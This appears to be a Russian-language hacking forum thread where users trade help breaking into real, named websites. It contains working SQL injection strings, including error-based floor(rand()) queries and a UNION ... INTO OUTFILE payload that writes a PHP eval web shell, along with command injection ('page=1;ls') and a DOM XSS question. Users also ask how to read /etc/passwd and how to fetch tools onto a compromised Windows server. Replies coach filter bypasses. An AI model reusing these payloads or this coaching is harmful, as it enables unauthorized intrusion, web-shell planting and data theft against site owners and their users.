Приветствую Вас. Я хотел бы спросить, возможно ли залить шелл на XenForo версии 1.0.4? Если да, то стучите в ЛС. Или расскажите тут. Заранее благодарен)
помогите раскрутить,что то не получается инъекция в заголовке в x-forwarded-for: 1'" Code: http://drive.s13.ru/?id=1 а то чё то туплю.
Залил shell на форум,открыл но там такая ситуация. http://savepic.org/2581219.png права на загрузку есть в папку tmp мона ли как-то оттуда потом открыть shell ? спасибо.
Помогите плиз, есть сайт при запросе page=1;ls отображает содержимое текущей директории, а вот при запросах с пробелами на пример page=1;ls -lha ничего не отображает.
Запрос: Code: http://www.rengl.cz/ceniky/mesto.php?id=-119'+union+select+1,'<?php eval($_GET[‘e’]) ?>',3,4,5,6,7,8,9,10 INTO OUTFILE '/srv/http/adent.cz/rengl.cz/1.php' --+ Результат (файл rengl.cz/1.php не создается): Code: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /srv/http/adent.cz/rengl.cz/ceniky/mesto.php on line 37 Почему?
<?php eval($_GET[‘e’]) ?> в HEX переведи попробуй. Может ещё быть что прав нет на корневую папку,ищи врайтабельную.
Да что вы говорите ? И из hex код исполнится ? Бред !! <?php eval($_GET[‘e’]) ?> можно и нужно урезать до <?php eval($_GET[e]); ?> Попробуй.
Есть скуля, раскрутить не знаю как _http://tagilcity.ru/component/option,com_fireboard/func,fbprofile/task,showprf'/?option=com_fireboard&func=showcat&Go=%25D0%2598%25D0%25B4%25D1%2582%25D0%25B8&catid=171
Code: http://tagilcity.ru/index.php?option=com_fireboard'+AND+(SELECT+4662+FROM(SELECT+COUNT(*),CONCAT(0x7e414e5449434841547e,(SELECT(CASE+WHEN+(4662=4662)+THEN+[COLOR=DarkRed]version()[/COLOR]+ELSE+0+END)),0x7e414e5449434841547e,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)+AND+'RGKx'='RGKx&func=fbprofile&task=showprf Найденную Вами SQL инъекцию можно сократить, т.к. запрос один и тот же, только вот первая его часть представлена как ЧПУ, а вторам с GET параметрами, собственно реализацию которой я Вам и продемонстрировал.
как тут раскрутить тогда? _http://www.orehi.net.ua/component/option,com_fireboard/Itemid,43/func,view'/id,9/view,threaded/catid,3/
Собственно нужна помощь: 1) Имею скуль "MySQL error based" 2) Вот пример скули, при которой у меня выдает название Базы данных сайта PHP: site.ru/catalog/type/0/1+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,database(),0x27,0x7e))+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+1=1 3) Как мне использую данную скуль прочитать etc/passwd ? 4) Как залить шелл через скуль имея полный путь до сайта и file_priv=Y
Не могу раскрутить одну SQL, её запрос: SELECT req, id FROM table_name WHERE `link` = '[SQL]' AND `count` > 0 SQL очевидно в REQUEST_URI, из этого следует, что все символы кодируются в urlencode и к тому же вырезается символ / - из за чего конструкция /**/ невозможна. Версия мускула 5.0.95, из этого следует, что функции extractvalue и updatexml не работают для вывода информации в ошибку, способ с floor rand тоже не работает из за режущегося символа / Остаётся только крутить через union, вывод на экран, но как это сделать не получается. Пробовал: -1'union(select(1,2))-- не работает, может быть ещё какие варианты есть? Сам URL спалить никак не смогу.
SELECT req, id FROM table_name WHERE `link` = '1' and (SUBSTRING((SELECT version()),1,1))=5#' AND `count` > 0 Что мешает крутить блиндем?
Попробуйте метод с name_const, очень часто выручает в случаях где надо выполнять запрос без пробелов в Error-Based!
юзер вводит, допустим, имя и сохрняет настройки, обновляет страничку - подгружается js скрипт, который формирует табличку с его именем через innerhtml. мы можем через xss в DOM объекте подгрузить произвольный скрипт? у меня не получилос( только косвенно... через инпутовский автофокус.
2 часа уже мучаюсь, не могу залиться на win сервак по пхп функциям ограничений нету,шелл удается запустить без загрузки( eval(file_get_contents('shell.txt')); ) но епта запросы пост если они длинные режутся и все, короткие без проблем.какие на винде если качалки типо wget,curl ?
Интересная скуля (помогите) Имеется ссылка вида : _http://site.com/news.php?page=0 Добавляю кавычку и появляется вот что ЧТО ЛИБО СДЕЛАТЬ МОЖНО?Помогите!
